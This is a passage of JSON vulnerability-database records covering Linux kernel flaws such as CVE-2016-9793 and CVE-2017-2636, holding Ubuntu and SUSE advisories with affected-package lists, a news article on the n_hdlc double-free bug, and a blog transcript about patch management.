"unix", "cvelist": ["CVE-2016-9793", "CVE-2016-9756"], "modified": "2017-01-11T00:00:00", "id": "USN-3170-1", "href": "https://usn.ubuntu.com/3170-1/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:12", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-9794", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-9793", "https://usn.ubuntu.com/usn/usn-3169-1"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0.1040.39", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-raspi2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-1040.47", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-1040-raspi2", "operator": "lt"}], "description": "Baozeng Ding discovered a race condition that could lead to a use-after- free in the Advanced Linux Sound Architecture (ALSA) subsystem of the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-9794)\n\nAndrey Konovalov discovered that signed integer overflows existed in the setsockopt() system call when handling the SO_SNDBUFFORCE and SO_RCVBUFFORCE options. A local attacker with the CAP_NET_ADMIN capability could use this to cause a denial of service (system crash or memory corruption). (CVE-2016-9793)", "edition": 3, "reporter": "Ubuntu", "published": "2017-01-11T00:00:00", "title": "Linux kernel (Raspberry Pi 2) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-9794", "CVE-2016-9793"], "modified": "2017-01-11T00:00:00", "id": "USN-3169-3", "href": "https://usn.ubuntu.com/3169-3/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:17:15", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "references": [], "description": "[![linux-kernel-double-free-vulnerability](https://4.bp.blogspot.com/-cNY4GF7b-4k/WMq0sCwyxvI/AAAAAAAAr0g/zJMbacrkhsw-FQoVkI9bUZgXa-pB-QrWACLcB/s1600/linux-kernel-double-free-vulnerability.png)](<https://4.bp.blogspot.com/-cNY4GF7b-4k/WMq0sCwyxvI/AAAAAAAAr0g/zJMbacrkhsw-FQoVkI9bUZgXa-pB-QrWACLcB/s1600/linux-kernel-double-free-vulnerability.png>)\n\nAnother dangerous vulnerability has been discovered in Linux kernel that dates back to 2009 and affects a large number of Linux distros, including Red Hat, Debian, Fedora, OpenSUSE, and Ubuntu. \n \nThe latest Linux kernel flaw ([CVE-2017-2636](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2636>)), which existed in the Linux kernel for the past seven years, allows a local unprivileged user to gain root privileges on affected systems or cause a denial of service (system crash). \n \nPositive Technologies researcher Alexander Popov discovered a race condition issue in the N_HLDC Linux kernel driver \u2013 which is responsible for dealing with High-Level Data Link Control (HDLC) data \u2013 that leads to double-free vulnerability. \n \n\u201c**Double Free**\u201d is one of the most common memory corruption bug that occurs when the application releases same memory location twice by calling the free() function on the same allocated memory. \n \nAn unauthenticated attacker may leverage this vulnerability to inject and execute arbitrary code in the security context of currently logged in user. \n \nThe vulnerability affects the majority of popular Linux distributions including [Red Hat Enterprise Linux 6, 7](<https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2636>), [Fedora](<https://bugzilla.redhat.com/show_bug.cgi?id=1430049>), [SUSE](<https://bugzilla.novell.com/show_bug.cgi?id=CVE-2017-2636>), [Debian](<https://security-tracker.debian.org/tracker/CVE-2017-2636>), and [Ubuntu](<https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-2636.html>). \n \nSince the flaw dates back to June 2009, Linux enterprise servers and devices have been vulnerable for a long time, but according to Positive Technologies, it is hard to say whether this vulnerability has actively been exploited in the wild or not. \n\n\n> \"The vulnerability is old, so it is widespread across Linux workstations and servers,\" [says](<https://www.ptsecurity.com/ww-en/about/news/199636/>) Popov. \"To automatically load the flawed module, an attacker needs only unprivileged user rights. Additionally, the exploit doesn't require any special hardware.\"\n\nThe researcher detected the vulnerability during system calls testing with the syzkaller fuzzer, which is a security code auditing software developed by Google. \n \nPopov then reported the flaw to kernel.org on February 28, 2017, along with the exploit prototype, as well as provided the patch to fix the issue. \n \nThe vulnerability has already been patched in the Linux kernel, and the security updates along with the vulnerability details were [published](<http://seclists.org/oss-sec/2017/q1/569>) on March 7. \n \nSo, users are encouraged to install the latest security updates as soon as possible, but if unable to apply the patch, the researcher advised blocking the flawed module (n_hdlc) manually to safeguard enterprise as well as home use of the operating system.\n", "reporter": "Swati Khandelwal", "published": "2017-03-16T04:54:00", "type": "thn", "title": "Linux Kernel Gets Patch For Years-Old Serious Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "info", "cvelist": ["CVE-2017-2636"], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2017-03-16T15:54:33", "id": "THN:FA88848EF7446185D7481A0AB338ACA7", "href": "https://thehackernews.com/2017/03/linux-kernel-vulnerability.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "avleonov": [{"lastseen": "2017-05-01T12:59:55", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "enchantments_done": [], "description": "It\u2019s the second part of our talk with Daniil Svetlov at his radio show \u201cSafe Environment\u201d recorded 29.03.2017. In this part we talk about vulnerabilities in Linux and proprietary software, problems of patch an vulnerability management, and mention some related compliance requirements.\n\n![How critical these vulnerabilities are? Are they really exploitable in our infrastructure?](https://avleonov.com/wp-content/uploads/2017/04/how_critical_vulnerability_is-1024x525.png)\n\nVideo with manually transcribed Russian/English subtitles:\n\nPrevious part [\"Programmers are also people who also make mistakes\"](<https://avleonov.com/2017/04/01/programmers-are-also-people-who-also-make-mistakes/>).\n\n**Taking about the fact that if you use fully updated software and do not use some self-written scripts, programs, then in theory everything will be safe. **\n\n**But recently there was some statistics that critical vulnerabilities stay in Linux kernel about 7 years from the moment they appeared as a result of a programmer's error till the moment they were found by our white hat researcher.**\n\n** But it is not clear during these seven years if cybercriminals have found them, used them and how many systems were broken using this vulnerabilities. Not to mention that some special government services may use it too.**\n\n> For example: The latest Linux kernel flaw ([CVE-2017-2636](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2636>)), which existed in the Linux kernel for the past seven years, allows a local unprivileged user to gain root privileges on affected systems or cause a denial of service (system crash). [The Hacker News](<http://thehackernews.com/2017/03/linux-kernel-vulnerability.html>)\n\nWell yes. There is such a statistic. There is also some criticism from proprietary software developers. Like you say \"many eyes that looks in code will find any error.\" This is a quote from Linus Torvalds, if I'm not mistaken.\n\n> Not exactly. **Linus's Law** is a claim about software development, named in honor of Linus Torvalds and formulated by Eric S. Raymond in his essay and book The Cathedral and the Bazaar (1999).[1][2] The law states that \"given enough eyeballs, all bugs are shallow\"; or more formally: \"Given a large enough beta-tester and co-developer base, almost every problem will be characterized quickly and the fix obvious to someone.\" [Wikipedia](<https://en.wikipedia.org/wiki/Linus%27s_Law>)\n\nBut in practice, yes, there are really old vulnerabilities that come up after many many years. Because apparently they did not looking for this vulnerabilities well enough.But we still don't have anything else, except Linux kernel. Therefore, they can say anything, but they will use it anyway. It is in the first place.\n\nAnd secondly, sometimes vulnerabilities appear in Microsoft software, for example in Windows. Quite possible that in some calculator, someday researchers will be found vulnerability from the times of Windows XP. All these are normal things.\n\nThe fact that some vulnerabilities were disclosed is not such a big trouble. The big troubles appear if vulnerabilities were not patched promptly. Particular systems in some particular infrastructure. Why do they get updated slowly?\n\nThe reasons can be quite different actually. Why, for example, do not update all applications at once?\n\nIf we have Linux servers, let's update them all. Great. But on these Linux servers we have our own applications. Who will guarantee that when updating some open-source components that these applications use, they just will not break. They can stop working suddenly and we will need to figure out why. It turns out that before update of any component, you need to undergo a complete testing process. This is also expensive.\n\n**Plus it also slows you down probably.**\n\nYes, and it slows down, so there must also be a compromise.\n\nIf you scanned your network, detected some vulnerabilities and brought them to IT administrator saying: \"Let's update!\", the natural questions will be _\"Why? How critical these vulnerabilities are? Are they really exploitable in our infrastructure?\"_ And in all companies the software will be updated only when it is really necessary.\n\nOr when we look at Windows workstations. You can update them, but you need to restart the computer. And users really do not like to reboot. Because they have some scripts working there.\n\n**Yes, or they just opened a document.**\n\nYes, the document is open, they work with it and then the window pops up: \"restart, you have critical update.\" This is also annoying, it interferes with their work. That delays the whole updating process.\n\n**Well, if we go back a week ago we had Sergei Soldatov here in the studio and we discussed the problem of so-called targeted attacks, APT in particular. And we discussed it at the end recommendations of Australian Department of Defence.**\n\n![STRATEGIES TO MITIGATE CYBER SECURITY INCIDENTS](https://avleonov.com/wp-content/uploads/2017/04/ASD_strategies.png)\n\nYou can read at <https://www.asd.gov.au/infosec/mitigationstrategies.htm>\n\n**They adore articles like \"15 first measures in order to increase information security\". And the four main things that you need to do in your infrastructure, in their opinion, if you want to protect yourself from APT:**\n\n * **Whitelisting applications so you can not run any untrusted application.**\n * **Restrict administrative privileges to all who do not need them for official duties.**\n * **The third and fourth is just to update of the operating system and update of all user applications.**\n\n**Sergey doubted the fact that the first two items are still relevant now because all the attacks are done not with malware, but with PowerShell, cmd, the most common software. **\n\n**And on the second point, he also said that very much can be done directly with user permissions. And if we talk about Trojans and CryptoLockers, they do not really need any admin rights, they will encrypt exactly what is available for the user. And yet, the remaining two items, update operating systems and software updates, are important. But, as I understand it, doing this is a scale of a big organization, when you have thousands of computers in principle, it is very difficult.**\n\nYes, indeed. I can agree that the Australian Defense Ministry is in a trend. Basically, the same recommendations can be found in the CIS Critical Controls and many many other standards. Even in PCI DSS.\n\n**PCI DSS requires all critical updates to be installed within a month.**\n\n> Requirement 6: Develop and maintain secure systems and applications \n\u2026 \n6.2 Protect all system components and software from known vulnerabilities by installing applicable vendor-supplied security patches. Install critical security patches within one month of release. \n<https://www.pcisecuritystandards.org/documents/PCIDSS_QRGv3_1.pdf>\n\nYes, both about updating and scanning vulnerabilities with certified solutions, and about scanning vulnerabilities with your scanner: not only perimeter, but also inside your network. All this is also in PCI DSS. Those. All modern standards really recommend this in one form or another.\n\nIs it difficult or simple: of course it is difficult. Here is the problem of scale. Let's say we have an infrastructure in with two servers, with Linux for example, and 20 workstations running Windows. Basically, we can manually monitor how they are updated and whether there are no vulnerabilities there. Or write your own scripts that will do it.\n\nAnother situation is when you have thousands and tens thousands of servers not only with Windows and Linux, but also with proprietary Unix, some network devices, etc. Some certified network devices from Russian local vendors can be used, that are unknown all over the world. All this greatly complicates the whole process of Vulnerability Management.\n\nIn fact, for each host of the network it is necessary to detect what software or firmware version it uses. View the list of vulnerabilities. To do this, you need to look at all security bulletins of each vendor. And then to understand which of the vulnerabilities are really critical in order to prioritize recommendations for the update.\n\nIf this is a large organization, then it's likely that IT administrators will make the updating. If the organization is small enough, then usually the IT administrator is the security guy at the same time, he is in charge of everything, and he will have to update infrastructure too.\n\n![](http://feeds.feedburner.com/~r/avleonov/~4/J65NgJfx9L4)", "reporter": "Alexander Leonov", "published": "2017-04-22T20:25:16", "title": "Why you can\u2019t update it all at once?", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "avleonov", "bulletinFamily": "blog", "cvelist": ["CVE-2017-2636"], "_object_type": "robots.models.rss.RssBulletin", "modified": "2017-04-22T20:25:16", "href": "http://feedproxy.google.com/~r/avleonov/~3/J65NgJfx9L4/", "id": "AVLEONOV:258C4C7C6D4C10965793FFCDA8860939", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2017-04-03T19:17:43", "references": ["https://bugzilla.suse.com/1027565"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-xen-devel-debuginfo", "packageFilename": "kernel-xen-devel-debuginfo-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-trace-debugsource", "packageFilename": "kernel-trace-debugsource-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-trace-extra", "packageFilename": "kernel-trace-extra-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-bigmem", "packageFilename": "kernel-bigmem-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-trace-debuginfo", "packageFilename": "kernel-trace-debuginfo-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-ppc64-devel", "packageFilename": "kernel-ppc64-devel-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-pae", "packageFilename": "kernel-pae-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-trace-debugsource", "packageFilename": "kernel-trace-debugsource-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-ppc64-base", "packageFilename": "kernel-ppc64-base-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-xen-base", "packageFilename": "kernel-xen-base-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-default-devel-debuginfo", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-trace-debuginfo", "packageFilename": "kernel-trace-debuginfo-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-ec2", "packageFilename": "kernel-ec2-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-pae-devel", "packageFilename": "kernel-pae-devel-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-xen-debugsource", "packageFilename": "kernel-xen-debugsource-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-pae-extra", "packageFilename": "kernel-pae-extra-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-ec2-debuginfo", "packageFilename": "kernel-ec2-debuginfo-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-default-devel-debuginfo", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-ec2-base", "packageFilename": "kernel-ec2-base-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-bigmem-base", "packageFilename": "kernel-bigmem-base-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-ec2", "packageFilename": "kernel-ec2-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-ec2-base", "packageFilename": "kernel-ec2-base-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-bigmem-debuginfo", "packageFilename": "kernel-bigmem-debuginfo-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-ec2-debugsource", "packageFilename": "kernel-ec2-debugsource-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-xen-devel-debuginfo", "packageFilename": "kernel-xen-devel-debuginfo-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-default-devel-debuginfo", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-xen-extra", "packageFilename": "kernel-xen-extra-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-ppc64", "packageFilename": "kernel-ppc64-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-default-devel-debuginfo", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-trace-devel-debuginfo", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-trace-debugsource", "packageFilename": "kernel-trace-debugsource-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-ppc64-debuginfo", "packageFilename": "kernel-ppc64-debuginfo-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-ec2-devel", "packageFilename": "kernel-ec2-devel-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.4", "packageVersion": "3.0.101-97.3", "arch": "noarch", "packageName": "kernel-docs", "packageFilename": "kernel-docs-3.0.101-97.3.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-default-debugsource", "packageFilename": 